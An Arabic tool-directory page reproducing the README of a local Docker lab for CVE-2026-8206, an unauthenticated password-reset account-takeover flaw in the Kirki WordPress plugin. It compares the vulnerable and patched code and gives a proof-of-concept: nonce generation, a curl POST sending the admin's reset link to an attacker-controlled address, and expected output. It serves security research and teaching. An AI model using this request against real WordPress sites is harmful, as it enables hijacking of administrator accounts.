Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-8206-Lab — مختبر Docker محلي يُظهر ثغرة CVE-2026-8206 للاستيلاء على الحساب بدون مصادقة في إضافة Kirki لووردبريس. يقارن بين الإصدار الضعيف 6.0.6 والإصدار المُصحح 6.0.7 مع سكربت إثبات المفهوم (PoC) والتحقق من البريد الإلكتروني الملتقط. | Kitploit
أدوات/GitHubGitHub/rootdirective-sec/cve-2026-8206-lab
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFالتعلم والتعليممختبرات وتدريب عملي
GitHubrootdirective-sec/cve-2026-8206-lab

CVE-2026-8206-Lab

مختبر Docker محلي يُظهر ثغرة CVE-2026-8206 للاستيلاء على الحساب بدون مصادقة في إضافة Kirki لووردبريس. يقارن بين الإصدار الضعيف 6.0.6 والإصدار المُصحح 6.0.7 مع سكربت إثبات المفهوم (PoC) والتحقق من البريد الإلكتروني الملتقط.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 2 أشهرلم تتم المراجعة بعد

CVE-2026-8206 - مختبر الاستيلاء على حساب Kirki

مختبر Docker محلي لعرض CVE-2026-8206 في إضافة Kirki لووردبريس.

يقارن هذا المستودع إصدارات إضافة Kirki الحقيقية:

  • vuln: Kirki 6.0.6
  • patched: Kirki 6.0.7

المختبر محلي فقط ويربط خدمات ووردبريس بـ 127.0.0.1. إثبات المفهوم (PoC) هو الأقل ضررًا: يطلب إعادة تعيين كلمة المرور ويتحقق من مستلم البريد الإلكتروني الملتقط داخل المختبر. لا يقوم بتغيير أي كلمة مرور.


ملخص

CVE-2026-8206 هي ثغرة استيلاء على الحساب / تصعيد صلاحيات غير مصادق عليها في إصدارات Kirki من 6.0.0 إلى 6.0.6.

يقوم معالج إعادة تعيين كلمة المرور الضعيف بإنشاء مفتاح إعادة تعيين لمستخدم ووردبريس حقيقي يتم اختياره عبر username، ولكنه يرسل بريد إعادة التعيين إلى عنوان بريد إلكتروني عشوائي يتم توفيره في الطلب.

في هذا المختبر:

root@kitploit:~
ضعيف => يتم إرسال رابط إعادة التعيين الخاص بـ admin إلى [email protected]
مصحح    => يتم رفض البريد الإلكتروني غير المتطابق ولا يتم إرسال بريد إعادة التعيين إلى [email protected]

المكون المتأثر

  • المنتج: Kirki – منشئ الصفحات الحرة، منشئ المواقع والمخصّص
  • الإصدارات المتأثرة: 6.0.0 إلى 6.0.6
  • الإصدار المُصحَح: 6.0.7
  • نقطة النهاية الضعيفة المستخدمة في هذا المختبر:
root@kitploit:~
/?rest_route=/KirkiComponentLibrary/v1/kirki-forgot-password

السبب الجذري

المعامل الضعيف هو:

root@kitploit:~
wp-content/plugins/kirki/ComponentLibrary/controller/CompLibFormHandler.php

السلوك الضعيف في 6.0.6

يقرأ Kirki البريد الإلكتروني المقدم من المهاجم من نص الطلب:

root@kitploit:~
$email = isset( $form_data['email'] ) ? sanitize_email( $form_data['email'] ) : '';

ثم يقوم بحل مستخدم ووردبريس المستهدف عبر اسم المستخدم وينشئ مفتاح إعادة تعيين كلمة المرور لذلك المستخدم:

root@kitploit:~
$key = get_password_reset_key( $user );

ولكن يتم إرسال بريد إعادة التعيين النهائي إلى $email المقدم في الطلب:

root@kitploit:~
$sent = wp_mail( $email, $email_subject, $email_body, $headers );

هذا يكسر حد الثقة بين هوية الحساب ومستلم البريد الإلكتروني لإعادة التعيين. يمكن لمقدم طلب غير مصادق عليه تقديم:

root@kitploit:~
username=admin
[email protected]

مفتاح إعادة التعيين يخص admin، ولكن يتم تسليم البريد الإلكتروني إلى عنوان يتحكم فيه المهاجم.

السلوك المُصحَح في 6.0.7

يتحقق Kirki 6.0.7 من أن البريد الإلكتروني المقدم يطابق البريد الإلكتروني المسجل للمستخدم المُستخرج، ثم يفرض أن يكون المستلم هو بريد الحساب قبل الإرسال:

root@kitploit:~
$user_email = $user->get( 'user_email' );
if ( $email !== $user_email ) {
    // reject request
}

$email = $user_email;
$sent  = wp_mail( $email, $email_subject, $email_body, $headers );

تصميم المختبر

يتم التقاط البريد المحلي في ملفات بدلاً من إرساله خارجيًا:

root@kitploit:~
artifacts/vuln-mail/
artifacts/patched-mail/

يستخدم المختبر إصدارات حقيقية من إضافة Kirki مثبتة عبر WP-CLI. لم يتم تعديل مصدر الإضافة.


هيكل المستودع

root@kitploit:~
.
├── docker-compose.yml
├── vuln/
│   └── Dockerfile
├── patched/
│   └── Dockerfile
├── docker/
│   ├── capture-mail
│   └── mail-capture.ini
├── scripts/
│   └── setup-wordpress.sh
├── poc/
│   ├── poc_local.py
│   └── run_lab_poc.sh
├── docs/
│   └── notes.md
├── SAFETY.md
├── README.md
└── .gitignore

المتطلبات

  • Docker Desktop أو Docker Engine
  • Docker Compose v2
  • Python 3
  • حزمة Python requests

تثبيت اعتماديات Python إذا لزم الأمر:

root@kitploit:~
python3 -m pip install requests

تشغيل المختبر

شغّل الحاويات:

root@kitploit:~
docker compose up -d --build

ازرع كلا مثيلَي ووردبريس:

root@kitploit:~
docker compose run --rm wpcli_vuln
docker compose run --rm wpcli_patched

شغّل إثبات المفهوم:

root@kitploit:~
chmod +x poc/run_lab_poc.sh
./poc/run_lab_poc.sh

النتائج المتوقعة

ضعيف: Kirki 6.0.6

النتيجة المتوقعة:

root@kitploit:~
[+] request: http=200 body='{"message":"Email sent"}'
[+] mail_state=MAIL_TO_ATTACKER_WITH_RESET_LINK: reset link sent to attacker-controlled email
[+] verdict=VULNERABLE_BEHAVIOR_CONFIRMED
    To: [email protected]
    Subject: CVE-2026-8206 local lab proof

يثبت هذا أن الإصدار الضعيف أرسل بريد إعادة تعيين كلمة المرور للحساب المستهدف إلى عنوان يتحكم فيه المهاجم.

مصحح: Kirki 6.0.7

النتيجة المتوقعة:

root@kitploit:~
[+] request: http=404 body='{"message":"Invalid email address"}'
[+] mail_file=none
[+] mail_state=NO_MAIL: no captured reset email
[+] verdict=PATCHED_BEHAVIOR_CONFIRMED_NO_RESET_MAIL_TO_ATTACKER

يثبت هذا أن الإصدار المُصحَح يرفض عدم تطابق اسم المستخدم/البريد الإلكتروني ولا يرسل بريد إعادة التعيين إلى عنوان يتحكم فيه المهاجم.


التحقق اليدوي

أنشئ nonce الصحيح لعنصر Kirki داخل المختبر الضعيف:

root@kitploit:~
NONCE="$(docker compose run --rm --entrypoint wp wpcli_vuln eval 'echo wp_create_nonce(KIRKI_COMPONENT_LIBRARY_APP_PREFIX . "_kirki-forgot-password");' | tail -n 1)"

أرسل طلبًا محليًا فقط إلى الخدمة الضعيفة:

root@kitploit:~
curl -i -s -X POST "http://127.0.0.1:8081/?rest_route=/KirkiComponentLibrary/v1/kirki-forgot-password" \
  -H "X-WP-Element-Nonce: $NONCE" \
  -d "username=admin" \
  -d "[email protected]" \
  --data-urlencode "emailSubject=CVE-2026-8206 local lab proof" \
  --data-urlencode 'emailBody=[{"type":"text","value":"Local lab reset link: "},{"type":"chip","value":"reset_link"}]'

تحقق من البريد الملتقط:

root@kitploit:~
grep -R "^To:\|action=rp\|login=admin" artifacts/vuln-mail/

الدليل الضعيف المتوقع:

root@kitploit:~
To: [email protected]
... action=rp ... login=admin ...

السلامة

هذا المختبر مخصص للبحث الأمني المحلي وعرض المحفظة فقط.

ضوابط الأمان:

  • يربط الخدمات بـ 127.0.0.1 فقط.
  • يستخدم عناوين بريد إلكتروني محلية وهمية.
  • يلتقط البريد محليًا بدلاً من إرسال بريد حقيقي.
  • لا يغير كلمات المرور.
  • لا يحاول استغلال الأنظمة الخارجية.

التنظيف

root@kitploit:~
docker compose down -v --remove-orphans
rm -rf artifacts/vuln-mail artifacts/patched-mail

المراجع

  • سجل CVE: https://www.cve.org/CVERecord?id=CVE-2026-8206
  • إعلان Wordfence: https://www.wordfence.com/blog/2026/06/unauthenticated-privilege-escalation-vulnerability-patched-in-kirki-wordpress-plugin/
  • قاعدة بيانات ثغرات Wordfence: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kirki/kirki-600-606-unauthenticated-privilege-escalation-via-handle-forgot-password
  • صفحة إضافة ووردبريس / سجل التغييرات: https://wordpress.org/plugins/kirki/
  • مدخل OpenCVE: https://app.opencve.io/cve/CVE-2026-8206
تنزيل الأداة
الخدمةالغرضرابط المضيف
vulnووردبريس + Kirki 6.0.6http://127.0.0.1:8081
patchedووردبريس + Kirki 6.0.7http://127.0.0.1:8082
db_vulnMySQL لووردبريس الضعيفشبكة Docker فقط
db_patchedMySQL لووردبريس المُصحَحشبكة Docker فقط
wpcli_vulnيزرع ووردبريس الضعيفإعداد لمرة واحدة
wpcli_patchedيزرع ووردبريس المُصحَحإعداد لمرة واحدة